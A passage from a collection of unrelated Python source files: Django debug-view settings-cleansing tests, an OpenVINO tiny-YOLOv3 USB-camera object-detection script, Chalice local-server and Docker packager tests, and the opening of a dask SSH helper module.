response = self.client.get('/raises500/', HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(response['Content-Type'], 'text/plain; charset=utf-8')
class HelperFunctionTests(SimpleTestCase):
def test_cleanse_setting_basic(self):
self.assertEqual(cleanse_setting('TEST', 'TEST'), 'TEST')
self.assertEqual(cleanse_setting('PASSWORD', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_ignore_case(self):
self.assertEqual(cleanse_setting('password', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_recurses_in_dictionary(self):
initial = {'login': 'cooper', 'password': 'secret'}
expected = {'login': 'cooper', 'password': CLEANSED_SUBSTITUTE}
self.assertEqual(cleanse_setting('SETTING_NAME', initial), expected)
|
openvino_tiny-yolov3_MultiStick_test.py
|
import sys, os, cv2, time, heapq, argparse
import numpy as np, math
from openvino.inference_engine import IENetwork, IEPlugin
import multiprocessing as mp
from time import sleep
import threading
yolo_scale_13 = 13
yolo_scale_26 = 26
yolo_scale_52 = 52
classes = 80
coords = 4
num = 3
anchors = [10,14, 23,27, 37,58, 81,82, 135,169, 344,319]
LABELS = ("person", "bicycle", "car", "motorbike", "aeroplane",
"bus", "train", "truck", "boat", "traffic light",
"fire hydrant", "stop sign", "parking meter", "bench", "bird",
"cat", "dog", "horse", "sheep", "cow",
"elephant", "bear", "zebra", "giraffe", "backpack",
"umbrella", "handbag", "tie", "suitcase", "frisbee",
"skis", "snowboard", "sports ball", "kite", "baseball bat",
"baseball glove", "skateboard", "surfboard","tennis racket", "bottle",
"wine glass", "cup", "fork", "knife", "spoon",
"bowl", "banana", "apple", "sandwich", "orange",
"broccoli", "carrot", "hot dog", "pizza", "donut",
"cake", "chair", "sofa", "pottedplant", "bed",
"diningtable", "toilet", "tvmonitor", "laptop", "mouse",
"remote", "keyboard", "cell phone", "microwave", "oven",
"toaster", "sink", "refrigerator", "book", "clock",
"vase", "scissors", "teddy bear", "hair drier", "toothbrush")
label_text_color = (255, 255, 255)
label_background_color = (125, 175, 75)
box_color = (255, 128, 0)
box_thickness = 1
processes = []
fps = ""
detectfps = ""
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
lastresults = None
def EntryIndex(side, lcoords, lclasses, location, entry):
n = int(location / (side * side))
loc = location % (side * side)
return int(n * side * side * (lcoords + lclasses + 1) + entry * side * side + loc)
class DetectionObject():
xmin = 0
ymin = 0
xmax = 0
ymax = 0
class_id = 0
confidence = 0.0
def __init__(self, x, y, h, w, class_id, confidence, h_scale, w_scale):
self.xmin = int((x - w / 2) * w_scale)
self.ymin = int((y - h / 2) * h_scale)
self.xmax = int(self.xmin + w * w_scale)
self.ymax = int(self.ymin + h * h_scale)
self.class_id = class_id
self.confidence = confidence
def IntersectionOverUnion(box_1, box_2):
width_of_overlap_area = min(box_1.xmax, box_2.xmax) - max(box_1.xmin, box_2.xmin)
height_of_overlap_area = min(box_1.ymax, box_2.ymax) - max(box_1.ymin, box_2.ymin)
area_of_overlap = 0.0
if (width_of_overlap_area < 0.0 or height_of_overlap_area < 0.0):
area_of_overlap = 0.0
else:
area_of_overlap = width_of_overlap_area * height_of_overlap_area
box_1_area = (box_1.ymax - box_1.ymin) * (box_1.xmax - box_1.xmin)
box_2_area = (box_2.ymax - box_2.ymin) * (box_2.xmax - box_2.xmin)
area_of_union = box_1_area + box_2_area - area_of_overlap
retval = 0.0
if area_of_union <= 0.0:
retval = 0.0
else:
retval = (area_of_overlap / area_of_union)
return retval
def ParseYOLOV3Output(blob, resized_im_h, resized_im_w, original_im_h, original_im_w, threshold, objects):
out_blob_h = blob.shape[2]
out_blob_w = blob.shape[3]
side = out_blob_h
anchor_offset = 0
if side == yolo_scale_13:
anchor_offset = 2 * 3
elif side == yolo_scale_26:
anchor_offset = 2 * 0
side_square = side * side
output_blob = blob.flatten()
for i in range(side_square):
row = int(i / side)
col = int(i % side)
for n in range(num):
obj_index = EntryIndex(side, coords, classes, n * side * side + i, coords)
box_index = EntryIndex(side, coords, classes, n * side * side + i, 0)
scale = output_blob[obj_index]
if (scale < threshold):
continue
x = (col + output_blob[box_index + 0 * side_square]) / side * resized_im_w
y = (row + output_blob[box_index + 1 * side_square]) / side * resized_im_h
height = math.exp(output_blob[box_index + 3 * side_square]) * anchors[anchor_offset + 2 * n + 1]
width = math.exp(output_blob[box_index + 2 * side_square]) * anchors[anchor_offset + 2 * n]
for j in range(classes):
class_index = EntryIndex(side, coords, classes, n * side_square + i, coords + 1 + j)
prob = scale * output_blob[class_index]
if prob < threshold:
continue
obj = DetectionObject(x, y, height, width, j, prob, (original_im_h / resized_im_h), (original_im_w / resized_im_w))
objects.append(obj)
return objects
def camThread(LABELS, results, frameBuffer, camera_width, camera_height, vidfps):
global fps
global detectfps
global lastresults
global framecount
global detectframecount
global time1
global time2
global cam
global window_name
cam = cv2.VideoCapture(0)
if cam.isOpened() != True:
print("USB Camera Open Error!!!")
sys.exit(0)
cam.set(cv2.CAP_PROP_FPS, vidfps)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
window_name = "USB Camera"
wait_key_time = 1
#cam = cv2.VideoCapture("data/input/testvideo4.mp4")
#camera_width = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))
#camera_height = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))
#frame_count = int(cam.get(cv2.CAP_PROP_FRAME_COUNT))
#window_name = "Movie File"
#wait_key_time = int(1000 / vidfps)
cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)
while True:
t1 = time.perf_counter()
# USB Camera Stream Read
s, color_image = cam.read()
if not s:
continue
if frameBuffer.full():
frameBuffer.get()
height = color_image.shape[0]
width = color_image.shape[1]
frameBuffer.put(color_image.copy())
if not results.empty():
objects = results.get(False)
detectframecount += 1
for obj in objects:
if obj.confidence < 0.2:
continue
label = obj.class_id
confidence = obj.confidence
if confidence > 0.2:
label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
lastresults = objects
else:
if not isinstance(lastresults, type(None)):
for obj in lastresults:
if obj.confidence < 0.2:
continue
label = obj.class_id
confidence = obj.confidence
if confidence > 0.2:
label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
cv2.putText(color_image, fps, (width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.putText(color_image, detectfps, (width-170,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.imshow(window_name, cv2.resize(color_image, (width, height)))
if cv2.waitKey(wait_key_time)&0xFF == ord('q'):
sys.exit(0)
## Print FPS
framecount += 1
if framecount >= 15:
fps = "(Playback) {:.1f} FPS".format(time1/15)
detectfps = "(Detection) {:.1f} FPS".format(detectframecount/time2)
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
time2 += elapsedTime
# l = Search list
# x = Search target value
def searchlist(l, x, notfoundvalue=-1):
if x in l:
return l.index(x)
else:
return notfoundvalue
def async_infer(ncsworker):
#ncsworker.skip_frame_measurement()
while True:
ncsworker.predict_async()
class NcsWorker(object):
def __init__(self, devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps):
self.devid = devid
self.frameBuffer = frameBuffer
self.model_xml = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.xml"
self.model_bin = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.bin"
self.camera_width = camera_width
self.camera_height = camera_height
self.m_input_size = 416
self.threshould = 0.2
self.num_requests = 4
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
self.plugin = IEPlugin(device="MYRIAD")
self.net = IENetwork(model=self.model_xml, weights=self.model_bin)
self.input_blob = next(iter(self.net.inputs))
self.exec_net = self.plugin.load(network=self.net, num_requests=self.num_requests)
self.results = results
self.number_of_ncs = number_of_ncs
self.predict_async_time = 800
self.skip_frame = 0
self.roop_frame = 0
self.vidfps = vidfps
def image_preprocessing(self, color_image):
prepimg = cv2.resize(color_image, (self.m_input_size, self.m_input_size))
prepimg = prepimg[np.newaxis, :, :, :] # Batch size axis add
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def skip_frame_measurement(self):
surplustime_per_second = (1000 - self.predict_async_time)
if surplustime_per_second > 0.0:
frame_per_millisecond = (1000 / self.vidfps)
total_skip_frame = surplustime_per_second / frame_per_millisecond
self.skip_frame = int(total_skip_frame / self.num_requests)
else:
self.skip_frame = 0
def predict_async(self):
try:
if self.frameBuffer.empty():
return
self.roop_frame += 1
if self.roop_frame <= self.skip_frame:
self.frameBuffer.get()
return
self.roop_frame = 0
prepimg = self.image_preprocessing(self.frameBuffer.get())
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1:
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
heapq.heappush(self.heap_request, (self.inferred_cnt, reqnum))
cnt, dev = heapq.heappop(self.heap_request)
if self.exec_net.requests[dev].wait(0) == 0:
self.exec_net.requests[dev].wait(-1)
objects = []
outputs = self.exec_net.requests[dev].outputs
for output in outputs.values():
objects = ParseYOLOV3Output(output, self.m_input_size, self.m_input_size, self.camera_height, self.camera_width, self.threshould, objects)
objlen = len(objects)
for i in range(objlen):
if (objects[i].confidence == 0.0):
continue
for j in range(i + 1, objlen):
if (IntersectionOverUnion(objects[i], objects[j]) >= 0.4):
if objects[i].confidence < objects[j].confidence:
objects[i], objects[j] = objects[j], objects[i]
objects[j].confidence = 0.0
self.results.put(objects)
self.inferred_request[dev] = 0
else:
heapq.heappush(self.heap_request, (cnt, dev))
except:
import traceback
traceback.print_exc()
def inferencer(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps):
# Init infer threads
threads = []
for devid in range(number_of_ncs):
thworker = threading.Thread(target=async_infer, args=(NcsWorker(devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps),))
thworker.start()
threads.append(thworker)
for th in threads:
th.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-numncs','--numberofncs',dest='number_of_ncs',type=int,default=1,help='Number of NCS. (Default=1)')
args = parser.parse_args()
number_of_ncs = args.number_of_ncs
camera_width = 320
camera_height = 240
vidfps = 30
try:
mp.set_start_method('forkserver')
frameBuffer = mp.Queue(10)
results = mp.Queue()
# Start detection MultiStick
# Activation of inferencer
p = mp.Process(target=inferencer, args=(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps), daemon=True)
p.start()
processes.append(p)
sleep(number_of_ncs * 7)
# Start streaming
p = mp.Process(target=camThread, args=(LABELS, results, frameBuffer, camera_width, camera_height, vidfps), daemon=True)
p.start()
processes.append(p)
while True:
sleep(1)
except:
import traceback
traceback.print_exc()
finally:
for p in range(len(processes)):
processes[p].terminate()
print("\n\nFinished\n\n")
|
test_local.py
|
import os
import socket
import time
import contextlib
from threading import Thread
from threading import Event
from threading import Lock
import json
import subprocess
from contextlib import contextmanager
import pytest
import mock
import requests
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
from chalice import app
from chalice.awsclient import TypedAWSClient
from chalice.deploy.models import LambdaFunction
from chalice.deploy.packager import LambdaDeploymentPackager
from chalice.deploy.packager import LayerDeploymentPackager
from chalice.docker import LambdaImageBuilder
from chalice.local import create_local_server, DockerPackager
from chalice.local import ContainerProxyResourceManager
from chalice.local import LambdaLayerDownloader
from chalice.config import Config
from chalice.utils import OSUtils, UI
APPS_DIR = os.path.dirname(os.path.abspath(__file__))
ENV_APP_DIR = os.path.join(APPS_DIR, 'envapp')
BASIC_APP = os.path.join(APPS_DIR, 'basicapp')
NEW_APP_VERSION = """
from chalice import Chalice
app = Chalice(app_name='basicapp')
@app.route('/')
def index():
return {'version': 'reloaded'}
"""
@contextmanager
def cd(path):
try:
original_dir = os.getcwd()
os.chdir(path)
yield
finally:
os.chdir(original_dir)
@pytest.fixture()
def basic_app(tmpdir):
tmpdir = str(tmpdir.mkdir('basicapp'))
OSUtils().copytree(BASIC_APP, tmpdir)
return tmpdir
class ThreadedLocalServer(Thread):
def __init__(self, port, host='localhost'):
super(ThreadedLocalServer, self).__init__()
self._app_object = None
self._config = None
self._host = host
self._port = port
self._server = None
self._server_ready = Event()
def wait_for_server_ready(self):
self._server_ready.wait()
def configure(self, app_object, config):
self._app_object = app_object
self._config = config
def run(self):
self._server = create_local_server(
self._app_object, self._config, self._host, self._port)
self._server_ready.set()
self._server.serve_forever()
def make_call(self, method, path, port, timeout=0.5):
self._server_ready.wait()
return method('http://{host}:{port}{path}'.format(
path=path, host=self._host, port=port), timeout=timeout)
def shutdown(self):
if self._server is not None:
self._server.server.shutdown()
@pytest.fixture
def config():
return Config()
@pytest.fixture()
def unused_tcp_port():
with contextlib.closing(socket.socket()) as sock:
sock.bind(('127.0.0.1', 0))
return sock.getsockname()[1]
@pytest.fixture()
def http_session():
session = requests.Session()
retry = Retry(
# How many connection-related errors to retry on.
connect=10,
# A backoff factor to apply between attempts after the second try.
backoff_factor=2,
method_whitelist=['GET', 'POST', 'PUT'],
)
session.mount('http://', HTTPAdapter(max_retries=retry))
return HTTPFetcher(session)
class HTTPFetcher(object):
def __init__(self, session):
self.session = session
def json_get(self, url):
response = self.session.get(url)
response.raise_for_status()
return json.loads(response.content)
@pytest.fixture()
def local_server_factory(unused_tcp_port):
threaded_server = ThreadedLocalServer(unused_tcp_port)
def create_server(app_object, config):
threaded_server.configure(app_object, config)
threaded_server.start()
return threaded_server, unused_tcp_port
try:
yield create_server
finally:
threaded_server.shutdown()
@pytest.fixture
def sample_app():
demo = app.Chalice('demo-app')
thread_safety_check = []
lock = Lock()
@demo.route('/', methods=['GET'])
def index():
return {'hello': 'world'}
@demo.route('/test-cors', methods=['POST'], cors=True)
def test_cors():
return {'hello': 'world'}
@demo.route('/count', methods=['POST'])
def record_counter():
# An extra delay helps ensure we consistently fail if we're
# not thread safe.
time.sleep(0.001)
count = int(demo.current_request.json_body['counter'])
with lock:
thread_safety_check.append(count)
@demo.route('/count', methods=['GET'])
def get_record_counter():
return thread_safety_check[:]
return demo
def test_has_thread_safe_current_request(config, sample_app,
local_server_factory):
local_server, port = local_server_factory(sample_app, config)
local_server.wait_for_server_ready()
num_requests = 25
num_threads = 5
# The idea here is that each requests.post() has a unique 'counter'
# integer. If the current request is thread safe we should see a number
# for each 0 - (num_requests * num_threads). If it's not thread safe
# we'll see missing numbers and/or duplicates.
def make_requests(counter_start):
for i in range(counter_start * num_requests,
(counter_start + 1) * num_requests):
# We're slowing the sending rate down a bit. The threaded
# http server is good, but not great. You can still overwhelm
# it pretty easily.
time.sleep(0.001)
requests.post(
'http://localhost:%s/count' % port, json={'counter': i})
threads = []
for i in range(num_threads):
threads.append(Thread(target=make_requests, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
response = requests.get('http://localhost:%s/count' % port)
assert len(response.json()) == len(range(num_requests * num_threads))
assert sorted(response.json()) == list(range(num_requests * num_threads))
def test_can_accept_get_request(config, sample_app, local_server_factory):
local_server, port = local_server_factory(sample_app, config)
response = local_server.make_call(requests.get, '/', port)
assert response.status_code == 200
assert response.text == '{"hello":"world"}'
def test_can_get_unicode_string_content_length(
config, local_server_factory):
demo = app.Chalice('app-name')
@demo.route('/')
def index_view():
return u'\u2713'
local_server, port = local_server_factory(demo, config)
response = local_server.make_call(requests.get, '/', port)
assert response.headers['Content-Length'] == '3'
def test_can_accept_options_request(config, sample_app, local_server_factory):
local_server, port = local_server_factory(sample_app, config)
response = local_server.make_call(requests.options, '/test-cors', port)
assert response.headers['Content-Length'] == '0'
assert response.headers['Access-Control-Allow-Methods'] == 'POST,OPTIONS'
assert response.text == ''
def test_can_accept_multiple_options_request(config, sample_app,
local_server_factory):
local_server, port = local_server_factory(sample_app, config)
response = local_server.make_call(requests.options, '/test-cors', port)
assert response.headers['Content-Length'] == '0'
assert response.headers['Access-Control-Allow-Methods'] == 'POST,OPTIONS'
assert response.text == ''
response = local_server.make_call(requests.options, '/test-cors', port)
assert response.headers['Content-Length'] == '0'
assert response.headers['Access-Control-Allow-Methods'] == 'POST,OPTIONS'
assert response.text == ''
def test_can_accept_multiple_connections(config, sample_app,
local_server_factory):
# When a GET request is made to Chalice from a browser, it will send the
# connection keep-alive header in order to hold the connection open and
# reuse it for subsequent requests. If the conncetion close header is sent
# back by the server the connection will be closed, but the browser will
# reopen a new connection just in order to have it ready when needed.
# In this case, since it does not send any content we do not have the
# opportunity to send a connection close header back in a response to
# force it to close the socket.
# This is an issue in Chalice since the single threaded local server will
# now be blocked waiting for IO from the browser socket. If a request from
# any other source is made it will be blocked until the browser sends
# another request through, giving us a chance to read from another socket.
local_server, port = local_server_factory(sample_app, config)
local_server.wait_for_server_ready()
# We create a socket here to emulate a browser's open connection and then
# make a request. The request should succeed.
socket.create_connection(('localhost', port), timeout=1)
try:
response = local_server.make_call(requests.get, '/', port)
except requests.exceptions.ReadTimeout:
assert False, (
'Read timeout occurred, the socket is blocking the next request '
'from going though.'
)
assert response.status_code == 200
assert response.text == '{"hello":"world"}'
def test_can_import_env_vars(unused_tcp_port, http_session):
with cd(ENV_APP_DIR):
p = subprocess.Popen(['chalice', 'local', '--port',
str(unused_tcp_port)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_wait_for_server_ready(p)
try:
_assert_env_var_loaded(unused_tcp_port, http_session)
finally:
p.terminate()
def _wait_for_server_ready(process):
if process.poll() is not None:
raise AssertionError(
'Local server immediately exited with rc: %s' % process.poll()
)
def _assert_env_var_loaded(port_number, http_session):
response = http_session.json_get('http://localhost:%s/' % port_number)
assert response == {'hello': 'bar'}
def test_can_reload_server(unused_tcp_port, basic_app, http_session):
with cd(basic_app):
p = subprocess.Popen(['chalice', 'local', '--port',
str(unused_tcp_port)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_wait_for_server_ready(p)
url = 'http://localhost:%s/' % unused_tcp_port
try:
assert http_session.json_get(url) == {'version': 'original'}
# Updating the app should trigger a reload.
with open(os.path.join(basic_app, 'app.py'), 'w') as f:
f.write(NEW_APP_VERSION)
time.sleep(2)
assert http_session.json_get(url) == {'version': 'reloaded'}
finally:
p.terminate()
def test_container_proxy_resource_manager_build(basic_app, config):
class DummyLambda(LambdaFunction):
def __init__(self, handler, function_name):
self.handler = handler
self.function_name = function_name
self.resource_name = function_name
ui = mock.Mock(spec=UI)
osutils = mock.Mock(spec=OSUtils)
packager = mock.Mock(spec=DockerPackager)
image_builder = mock.Mock(spec=LambdaImageBuilder)
packager.package_layers.return_value = {
"a": "/path/a",
"b": "/path/b"
}
with cd(basic_app):
resource_manager = ContainerProxyResourceManager(
config, ui, osutils, packager, image_builder)
lambda_functions = [DummyLambda("1", "a"), DummyLambda("2", "b")]
containers = resource_manager.build_resources(lambda_functions)
packager.package_app.assert_called_with()
packager.package_layers.assert_called_with(lambda_functions)
image_builder.build.assert_called_with(config.lambda_python_version)
assert len(containers) == 2
assert 'a' in containers
assert 'b' in containers
def test_container_proxy_resource_manager_cleanup_nothing_no_errors():
config = Config(config_from_disk={"project_dir": "path"})
osutils = mock.Mock(spec=OSUtils)
resource_manager = ContainerProxyResourceManager(
config, None, osutils, None, None
)
resource_manager.cleanup()
class TestLambdaLayerDownloader(object):
@pytest.fixture
def lambda_client(self):
client = mock.Mock(spec=TypedAWSClient)
client.get_layer_version.return_value = {
"Content": {
"Location": "uri"
}
}
return client
@pytest.fixture
def osutils(self):
osutils = mock.Mock(spec=OSUtils)
osutils.joinpath = os.path.join
osutils.file_exists.return_value = False
return osutils
@pytest.fixture
def session(self):
session = mock.Mock(spec=requests.Session)
session.get.return_value.iter_content.return_value = []
return session
@pytest.fixture
def layer_downloader(self, config, lambda_client, osutils, session):
ui = mock.Mock(spec=UI)
layer_downloader = LambdaLayerDownloader(config, ui, lambda_client,
osutils, session)
return layer_downloader
def test_layer_downloader_download_all(self, osutils, lambda_client,
session, layer_downloader,
basic_app, config):
layer_arns = {"arn1", "arn2", "arn3"}
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
paths = layer_downloader.download_all(layer_arns, cache_dir)
files = os.listdir(cache_dir)
for file in files:
assert file.startswith("layer-")
python_version = config.lambda_python_version
assert file.endswith("-" + python_version + ".zip")
assert os.path.join(cache_dir, file) in paths
assert len(files) == len(layer_arns)
assert osutils.file_exists.call_count == len(layer_arns)
assert lambda_client.get_layer_version.call_count == len(layer_arns)
assert session.get.call_count == len(layer_arns)
assert len(paths) == len(layer_arns)
def test_layer_downloader_download_one(self, osutils, lambda_client,
session, layer_downloader,
basic_app, config):
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
path = layer_downloader.download("layer", cache_dir)
files = os.listdir(cache_dir)
assert len(files) == 1
file = files[0]
assert file.startswith("layer-")
python_version = config.lambda_python_version
assert file.endswith("-" + python_version + ".zip")
assert os.path.join(cache_dir, file) == path
osutils.file_exists.assert_called_once()
lambda_client.get_layer_version.assert_called_once()
session.get.assert_called_once()
def test_layer_downloader_ignores_cached(self, osutils, lambda_client,
session, layer_downloader,
basic_app):
osutils.file_exists.return_value = True
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
osutils.file_exists.return_value = True
layer_downloader.download("hello", cache_dir)
files = os.listdir(cache_dir)
assert len(files) == 0
osutils.file_exists.assert_called_once()
lambda_client.get_layer_version.assert_not_called()
session.get.assert_not_called()
def test_layer_downloader_download_invalid_arn_raises_error(
self, lambda_client, layer_downloader, basic_app):
lambda_client.get_layer_version.return_value = {}
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
with pytest.raises(ValueError) as e:
layer_downloader.download("hello", cache_dir)
files = os.listdir(cache_dir)
assert len(files) == 0
assert "Invalid layer arn" in str(e.value)
class TestDockerPackager(object):
@pytest.fixture
def config(self, basic_app):
config = Config(
config_from_disk={
'project_dir': basic_app,
'layers': ['hello', 'world', 'layers']
}
)
def dummy_scope(stage, function):
return config
config.scope = dummy_scope
return config
@pytest.fixture
def autolayer_config(self, basic_app):
config = Config(
config_from_disk={
'project_dir': basic_app,
'layers': ['hello', 'world', 'layers'],
'automatic_layer': True
}
)
def dummy_scope(stage, function):
return config
config.scope = dummy_scope
return config
@pytest.fixture
def layer_downloader(self):
layer_downloader = mock.Mock(spec=LambdaLayerDownloader)
layer_downloader.download_all.return_value = [
'hello.zip', 'world.zip', 'layers.zip'
]
return layer_downloader
@pytest.fixture
def app_packager(self):
app_packager = mock.Mock(spec=LambdaDeploymentPackager)
app_packager.create_deployment_package.return_value = "app.zip"
return app_packager
@pytest.fixture
def layer_packager(self):
layer_packager = mock.Mock(spec=LayerDeploymentPackager)
layer_packager.create_deployment_package.return_value = "layer.zip"
return layer_packager
@pytest.fixture
def docker_packager(self, config, osutils, app_packager,
layer_packager, layer_downloader):
return DockerPackager(config, osutils, app_packager,
layer_packager, layer_downloader)
@pytest.fixture
def osutils(self):
osutils = mock.Mock(spec=OSUtils)
osutils.joinpath = os.path.join
osutils.makedirs = os.makedirs
osutils.directory_exists.return_value = False
osutils.file_exists.return_value = False
return osutils
class DummyLambda(LambdaFunction):
def __init__(self, handler, function_name):
self.handler = handler
self.function_name = function_name
self.resource_name = function_name
def test_package_app_not_existing(self, basic_app, osutils, config,
app_packager, docker_packager):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
path = docker_packager.package_app()
files = os.listdir(cache_dir)
assert "app" in files
expected_path = os.path.join(cache_dir, "app")
assert path == expected_path
assert osutils.extract_zipfile.called_with("app", expected_path)
python_version = config.lambda_python_version
app_packager.create_deployment_package.assert_called_with(
basic_app, python_version)
def test_package_app_already_exists(self, basic_app, osutils, config,
app_packager, docker_packager):
osutils.directory_exists.return_value = True
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
os.makedirs(cache_dir)
path = docker_packager.package_app()
files = os.listdir(cache_dir)
assert len(files) == 0
expected_path = os.path.join(cache_dir, "app")
assert path == expected_path
osutils.extract_zipfile.assert_not_called()
def test_package_layers_no_auto_layer(self, basic_app, osutils, config,
layer_packager, docker_packager):
osutils.directory_exists = os.path.isdir
with cd(basic_app):
prefix = os.path.join(basic_app, ".chalice",
"deployments", "layers-")
lambdas = [
self.DummyLambda("1", "a"),
self.DummyLambda("2", "b"),
self.DummyLambda("3", "c"),
]
path_map = docker_packager.package_layers(lambdas)
assert len(path_map) == 3
assert path_map["a"] == path_map["b"] == path_map["c"]
assert path_map["a"].startswith(prefix)
python_version = config.lambda_python_version
assert path_map["a"].endswith("-" + python_version)
layer_packager.create_deployment_package.assert_not_called()
def test_package_layers_with_auto_layer(self, basic_app, osutils,
autolayer_config, app_packager,
layer_packager, layer_downloader):
docker_packager = DockerPackager(autolayer_config, osutils,
app_packager, layer_packager,
layer_downloader)
with cd(basic_app):
docker_packager.package_layers([self.DummyLambda("1", "a")])
python_version = autolayer_config.lambda_python_version
layer_packager.create_deployment_package.assert_called_with(
basic_app, python_version)
def test_create_layer_directory_not_existing(self, basic_app, config,
docker_packager, osutils,
layer_downloader):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
layer_arns = ["arn1", "arn2", "arn3"]
path = docker_packager.create_layer_directory(layer_arns, "/path")
files = os.listdir(cache_dir)
assert len(files) == 1
assert files[0].startswith("layers")
python_version = config.lambda_python_version
assert files[0].endswith("-" + python_version)
expected_path = os.path.join(cache_dir, files[0])
assert path == expected_path
unzip_calls = [
mock.call("/path", path),
mock.call("hello.zip", path),
mock.call("world.zip", path),
mock.call("layers.zip", path)
]
osutils.extract_zipfile.assert_has_calls(unzip_calls)
assert osutils.extract_zipfile.call_count == 4
layer_downloader.download_all.assert_called_with(layer_arns,
cache_dir)
def test_create_layer_directory_already_exists(self, basic_app, config,
docker_packager, osutils,
layer_downloader):
osutils.directory_exists.return_value = True
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
os.makedirs(cache_dir)
layer_arns = ["arn1", "arn2", "arn3"]
path = docker_packager.create_layer_directory(layer_arns, "/path")
files = os.listdir(cache_dir)
assert len(files) == 0
expected_prefix = os.path.join(cache_dir, "layers-")
assert path.startswith(expected_prefix)
python_version = config.lambda_python_version
assert path.endswith("-" + python_version)
osutils.extract_zipfile.assert_not_called()
def test_create_layer_directory_no_autolayer(self, basic_app, config,
docker_packager, osutils,
layer_downloader):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
layer_arns = ["arn1", "arn2", "arn3"]
path = docker_packager.create_layer_directory(layer_arns, "")
files = os.listdir(cache_dir)
assert len(files) == 1
assert files[0].startswith("layers")
python_version = config.lambda_python_version
assert files[0].endswith("-" + python_version)
expected_path = os.path.join(cache_dir, files[0])
assert path == expected_path
unzip_calls = [
mock.call("hello.zip", path),
mock.call("world.zip", path),
mock.call("layers.zip", path)
]
osutils.extract_zipfile.assert_has_calls(unzip_calls)
assert osutils.extract_zipfile.call_count == 3
layer_downloader.download_all.assert_called_with(layer_arns,
cache_dir)
def test_create_layer_directory_different_output_on_autolayer_mismatch(
self, basic_app, docker_packager, osutils):
osutils.directory_exists = os.path.isdir
with cd(basic_app):
layer_arns = ["arn1", "arn2", "arn3"]
path1 = docker_packager.create_layer_directory(layer_arns, "")
path2 = docker_packager.create_layer_directory(layer_arns, "path")
assert path1 != path2
def test_create_layer_directory_does_not_raise_filename_too_long(
self, basic_app, layer_downloader, docker_packager, osutils):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
filename = "zip" * 25
layer_arns = [filename, filename, filename, filename, filename]
docker_packager.create_layer_directory(layer_arns, "/path")
files = os.listdir(cache_dir)
assert len(files) == 1
assert files[0].startswith("layers-")
def test_creates_cache_dir_if_nonexistent(
self, osutils, docker_packager, basic_app):
osutils.directory_exists.return_value = False
with cd(basic_app):
docker_packager.package_app()
chalice_dir = os.path.join(basic_app, ".chalice")
assert 'deployments' in os.listdir(chalice_dir)
|
old_ssh.py
|
import logging
import os
import socket
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from tlz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import PasswordRequiredException, SSHException
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
